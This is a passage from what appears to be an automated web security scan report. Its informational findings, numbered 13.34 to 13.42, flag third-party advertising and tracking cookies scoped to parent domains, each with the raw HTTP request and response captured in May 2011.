GET /b?c1=2&c2=3005403&rn=909564512&c7=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&c4=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&c5=business%20day&c8=Private%20Equity%20Has%20a%20Horse%20in%20the%20Race%20-%20NYTim&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 12 May 2011 11:04:16 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 11-May-2013 11:04:16 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

13.34. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iVAyaL8w0clo00001jlP8aJjE0dpH00001iLxqaLMH07l000001iLznaM7707l000001jz2OaLMO0cEf00001iRpfaL7W0c9M00001jpdKaLsn073a00002juYhaL6q07Kl00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001jelLaL7W07pd00002jAsGaJH602WG00003jBofaIOs07Si00001iLaRaL9K0bnA00001iRoBaLsa0c9M00001isyIaL8z02WG00001; expires=Wed, 10-Aug-2011 07:03:16 GMT; domain=.serving-sys.com; path=/
B3=82s80000000002uy8Whx0000000003uu9wtb0000000001ur9qGw0000000002uz9oDg0000000001ut97QM0000000001uA97QP0000000001uB9vHV0000000001uA910k0000000001uz9X5k0000000001uA910n0000000001uy98nW0000000001uy9c210000000002uy9yEe0000000001uA8SAT0000000001uy96EU0000000001uy7dOu0000000001uy9yEg0000000001uA; expires=Wed, 10-Aug-2011 07:03:16 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2391347&PluID=0&w=728&h=90&ord=2011.05.12.11.02.51&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iLxqaLMH07l000001jlP8aJjE0dpH00001iVAyaL8w0clo00001jpdKaLsn073a00002iRpfaL7W0c9M00001jz2OaLMO0cEf00001juYhaL6q07Kl00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001iLaRaL9K0bnA00001jBofaIOs07Si00001jAsGaJH602WG00003jelLaL7W07pd00002iRoBaLsa0c9M00001isyIaL8z02WG00001; B3=9qGw0000000002uz9wtb0000000001ur8Whx0000000003uu82s80000000002uy9oDg0000000001ut97QM0000000001uA9vHV0000000001uA9X5k0000000001uA910k0000000001uz98nW0000000001uy910n0000000001uy9c210000000002uy96EU0000000001uy8SAT0000000001uy9yEe0000000001uA9yEg0000000001uA7dOu0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iVAyaL8w0clo00001jlP8aJjE0dpH00001iLxqaLMH07l000001iLznaM7707l000001jz2OaLMO0cEf00001iRpfaL7W0c9M00001jpdKaLsn073a00002juYhaL6q07Kl00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001jelLaL7W07pd00002jAsGaJH602WG00003jBofaIOs07Si00001iLaRaL9K0bnA00001iRoBaLsa0c9M00001isyIaL8z02WG00001; expires=Wed, 10-Aug-2011 07:03:16 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=82s80000000002uy8Whx0000000003uu9wtb0000000001ur9qGw0000000002uz9oDg0000000001ut97QM0000000001uA97QP0000000001uB9vHV0000000001uA910k0000000001uz9X5k0000000001uA910n0000000001uy98nW0000000001uy9c210000000002uy9yEe0000000001uA8SAT0000000001uy96EU0000000001uy7dOu0000000001uy9yEg0000000001uA; expires=Wed, 10-Aug-2011 07:03:16 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 11:03:15 GMT
Connection: close
Content-Length: 1885

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

13.35. http://cf.addthis.com/red/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cf.addthis.com
Path:	/red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

di=1304431085.1FE|1304431085.1OD|1304431085.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 11:49:36 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=2&gen=1000&gen=100&sid=4dcbc94ff9bf6231&callback=_ate.ad.hrr&pub=y2kesq&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fattorneys.html&ref=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcontact-us.html&1ca2uh6 HTTP/1.1
Host: cf.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.60|1304431085.1OD|1304431085.1FE; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 12 May 2011 11:49:36 GMT
Set-Cookie: di=1304431085.1FE|1304431085.1OD|1304431085.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 11:49:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11-Jun-2011 11:49:36 GMT; Path=/
Content-Type: text/javascript
Content-Length: 161
Date: Thu, 12 May 2011 11:49:35 GMT
Connection: close

_ate.ad.hrr({"urls":["http://p.addthis.com/pixel?pixelID=57148&partnerID=115&key=segment"],"segments":["1NE"],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

13.36. http://core.insightexpressai.com/adServer/adServerESI.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://core.insightexpressai.com
Path:	/adServer/adServerESI.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

IXAIBanners2554=175183,175237; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
IXAIFirstHit2554=5%2f12%2f2011+7%3a38%3a14+AM; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
IXAILastHit2554=5%2f12%2f2011+7%3a38%3a14+AM; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adServer/adServerESI.aspx?bannerID=175237&siteID=15917119013267459&creativeID=7164347 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074; IXAIBanners2554=175183; IXAIBannerCounter175183=1; IXAIControlCounter2554=1; lastInvite=4%2f23%2f2011+4%3a30%3a01+PM; IXAIinvited2554=true; IXAIBannerCounter174602=1; IXAIFirstHit2460=4%2f23%2f2011+4%3a31%3a40+PM; IXAIBanners2460=174602,174595; IXAIBannerCounter174595=1; IXAILastHit2460=5%2f2%2f2011+2%3a16%3a33+PM; IXAICampaignCounter2460=2; IXAIFirstHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAIBanners2708=178563; IXAIBannerCounter178563=1; IXAIFirstHit2708=5%2f9%2f2011+10%3a48%3a33+AM; IXAILastHit2708=5%2f9%2f2011+10%3a48%3a33+AM; IXAICampaignCounter2708=1; IXAIBanners2579=178140,178140,178140,178140,178140; IXAIBannerCounter178140=5; IXAILastHit2579=5%2f11%2f2011+10%3a28%3a40+AM; IXAICampaignCounter2579=5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 10
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAIBanners2554=175183,175237; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter175237=1; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIFirstHit2554=5%2f12%2f2011+7%3a38%3a14+AM; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2554=5%2f12%2f2011+7%3a38%3a14+AM; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2554=1; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Thu, 12 May 2011 11:39:23 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 11:39:23 GMT
Connection: close
Cache-Control: no-store

13.37. http://cspix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cspix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

acs=014020a0g0h1lkaebsxzt1sl6yxzt1sl6yxzt1p28s; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
clid=2lkaebs01171xcfgwn0ixqhg0sl6y0063o010k03505; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
rdrlst=4041194lkmm960cube0043o0110rdll12l4000000023o010znmlkmhha000000053o0110tell2ziq000000013o01; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
sglst=20k0s9ullkzgkk03iy60023n000k00500arrll12l401wxm0013n000k00500c25ll2ziq000000013o010k0150156bll2ziq000000013o010k01501ag2lkmm960gd9k0043o010k035049rylkmhha0cz3a0023f000j00500a6slkzgkk03iy60023n000k00500bnzlkmhha0gi1g0043n000k00500cgzlkmhha0gi1g0043n000k005000tilkmhha0gi1g0053o010k03505ahhll2ziq000000013o010k015010klll12l401wxm0023o010k02502a6rlkmhha0cz3a0023f000j00500dlell12l401wxm0023o010k02502abflkmhha0cz3a0023f000j00500bo0ll2ziq000000013o010k01501alhll2ziq000000013o010k01501dg4lkmhha0gi1g0043n000k00500942ll2ziq000000013o010k01501943lkzgkk03iy60023n000k00500; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2fwww.pomerantzlaw.com%2fattorneys.html HTTP/1.1
Host: cspix.media6degrees.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: clid=2lkaebs01171xcfgwn0ixqhg0qo9c0053n010k02504; ipinfo=2ll12l40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; vstcnt=417s010r034smk6127p10024nnav218e2022062032107238ca131p10d2; acs=014020a0g0h1lkaebsxzt1qo9cxzt1qo9cxzt1p28s; rdrlst=4031194lkmm960cube0033n0110rdll12l4000000013n010znmlkmhha000000043n01; sglst=20e0s9ullkzgkk000000023n010k02502arrll12l4000000013n010k01501ag2lkmm960egby0033n010k025039rylkmhha0cz3a0023f000j00500a6slkzgkk000000023n010k02502bnzlkmhha0el3u0043n010k02504cgzlkmhha0cz3a0043n010k025040tilkmhha0el3u0043n010k025040klll12l4000000013n010k01501a6rlkmhha0cz3a0023f000j00500dlell12l4000000013n010k01501abflkmhha0cz3a0023f000j00500dg4lkmhha0cz3a0043n010k02504943lkzgkk01m0k0023n010k02502

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=014020a0g0h1lkaebsxzt1sl6yxzt1sl6yxzt1p28s; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lkaebs01171xcfgwn0ixqhg0sl6y0063o010k03505; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4041194lkmm960cube0043o0110rdll12l4000000023o010znmlkmhha000000053o0110tell2ziq000000013o01; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Set-Cookie: sglst=20k0s9ullkzgkk03iy60023n000k00500arrll12l401wxm0013n000k00500c25ll2ziq000000013o010k0150156bll2ziq000000013o010k01501ag2lkmm960gd9k0043o010k035049rylkmhha0cz3a0023f000j00500a6slkzgkk03iy60023n000k00500bnzlkmhha0gi1g0043n000k00500cgzlkmhha0gi1g0043n000k005000tilkmhha0gi1g0053o010k03505ahhll2ziq000000013o010k015010klll12l401wxm0023o010k02502a6rlkmhha0cz3a0023f000j00500dlell12l401wxm0023o010k02502abflkmhha0cz3a0023f000j00500bo0ll2ziq000000013o010k01501alhll2ziq000000013o010k01501dg4lkmhha0gi1g0043n000k00500942ll2ziq000000013o010k01501943lkzgkk03iy60023n000k00500; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Set-Cookie: vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Location: http://cm.g.doubleclick.net/pixel?nid=media6degrees
Content-Length: 0
Date: Thu, 12 May 2011 11:49:38 GMT

13.38. http://da.newstogram.com/hg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.newstogram.com
Path:	/hg.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; expires=Fri, 11-May-2012 11:37:35 GMT; domain=.newstogram.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:35 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; expires=Fri, 11-May-2012 11:37:35 GMT; domain=.newstogram.com
Content-Length: 122

Newstogram.completed({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7","ip":"173.193.214.243"}})

13.39. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.elawmarketing.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

di=%7B%7D..1305200976.1FE|1305201657.1OD|1305200976.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 12:00:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.elawmarketing.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.elawmarketing.com%2Fabout%2Fclients&ref=http%3A%2F%2Fwww.elawmarketing.com%2F&149tj8h HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305200976.1FE|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 186
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 12:00:57 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 12:00:57 GMT; Path=/
Set-Cookie: di=%7B%7D..1305200976.1FE|1305201657.1OD|1305200976.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 12:00:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 12:00:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 12:00:57 GMT
Connection: close

_ate.ad.hpr({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

13.40. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.pomerantzlaw.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

di=%7B%7D..1305200976.1FE|1305200976.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 11:49:36 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.pomerantzlaw.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fattorneys.html&ref=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcontact-us.html&1mrdgam HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.60|1304431085.1OD|1304431085.1FE; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 318
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 11:49:36 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 11:49:36 GMT; Path=/
Set-Cookie: di=%7B%7D..1305200976.1FE|1305200976.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 11:49:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 11:49:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 11:49:36 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2
...[SNIP]...

13.41. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 12:02:00 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1748713%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3D0%26pop_nofreqcap%3D1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; acb757416=5_[r^XI()vsh<co>bPMvW_l44?enc=AAAAAAAA8D_NzMzMzMzsPwAAAKCZmfk_zczMzMzM7D8AAAAAAADwP0t2I4uVLkAzSsYda6b2ziVhr8pNAAAAAJdIBgA3AQAAMgMAAAIAAABXAgQAfL8AAAEAAABVU0QAVVNEAKAAWAKqAQAAPw8BAgUCAAUAAAAACyF_DAAAAAA.&tt_code=cm.pub_webmd&udj=uf%28%27a%27%2C+9940%2C+1305128822%29%3Buf%28%27c%27%2C+59839%2C+1305128822%29%3Buf%28%27r%27%2C+262743%2C+1305128822%29%3B&cnd=!mhzYQwi_0wMQ14QQGAAg_P4CMAE4qgNAAEiyBlCXkRlYAGDaAWgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABArkBAAAAAAAA8D_BAQAAAAAAAPA_yQGamZmZmZnxP9ABANAB4V0.&ccd=!TQWvKgi_0wMQ14QQGPz-AiAA; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:02:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 12:02:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb757416=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Location: http://ad.yieldmanager.com/st?anmember=541&anprice=&ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1
Date: Thu, 12 May 2011 12:02:00 GMT
Content-Length: 0

13.42. http://id.google.com/verify/EAAAAMuM38IiZaQMTv0qVSa50bs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAMuM38IiZaQMTv0qVSa50bs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=46=8speeaESqyhrMgr9xX2f3dfNmJleRrlferTqXy3eJg=hbrRwBcbVI4mN8f5; expires=Fri, 11-Nov-2011 11:16:11 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

